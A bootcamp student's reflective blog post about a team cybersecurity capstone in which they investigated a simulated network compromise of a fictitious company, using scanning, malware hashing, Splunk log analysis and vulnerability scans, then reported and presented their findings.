Cybersecurity Capstone
Throughout the Flatiron cyber security analytics bootcamp we learned many important pieces of the cyber security world in our GRC, Network, Systems, Hunt, SIEM, Strategy, and Threat courses. The knowledge we gained from these courses culminated in our Capstone project
The premise of the Capstone was that a fictitious organization called ACME had it’s network compromised and as a result the cyber security team was let go. Three other students and I were then tasked with determining the cause and depth on the compromise and steps we could take to ensure that would not happen again. There was also the added challenge that we were all working remotely and were spread across multiple time-zones.
There was no incident response plan in place so it was up to us to break the Capstone down in to manageable tasks and start creating a timeline as the three week deadline was quickly approaching. By having each team member delegated a set of machines really helped make sure we able to thoroughly investigate machines and make sure all ground was being covered.
With the planning stage completed were able to move on to the actual response. We quickly found a few threats through a combination of scanning and digital forensics and were able to apply a few lessons from our hunt class in a very interesting way. Once a few pieces of malicious software were identified we were able to hash them and check them against various online tools. This helped us actually find them in repositories and read the readme files in order to better understand the software we found.
I also recommended that we do a scan of the network in order to determine if any outside machines were communicating with our network. This utilized lessons we had learned from both our Network and Systems classes. We used Nmap scans and Zenmap scans and it allowed us to gain a better understanding of what truly was on the network and what protocols were or were not sending information.
Now that we had actually found some evidence ACME had been compromised, it was time to create a timeline for the attack. This is where skills we had gained from Security Information and Event Management (SIEM) really shined. We were able to download logs off of the various machines and import them in to an instance of SPLUNK. By using various regex filters we were able to paint a picture of who the threat was, what was compromised, where that threat was operating from, and when that compromised the network.
In order to ensure the network was properly set up and free from vulnerabilities a team member ran a rapid7 scan to check all of the machines in the network for vulnerabilities. I assisted in going through the detailed scan and came up with an outline for the various vulnerabilities it had detected.
With all of the data gathered we began to compile it in to our research report. Each team member focused on outlining the tasks they had been delegated and then we all worked together to make sure all of our finding were cohesive. We were able to compile screenshots of various scans and important findings and include them in our report as well.
Since our presentation was going to be live we made sure we practiced our slide deck as a group and that we all understand how we were going to present. While our main report was a few dozen pages our slide deck was far more condensed and left out many of the technical details. We presented to the CISO of our fictitious organization, which was one of our cohort leads, as well as other members of the Flatiron bootcamp. Our presentation was incredibly professional and we given great praise for our organizational skills regarding the presentation. While in the end we did miss a couple of clues, our skills in cyber security became a lot stronger.
I look forward to the rest of the challenges I will face as a cyber security professional.
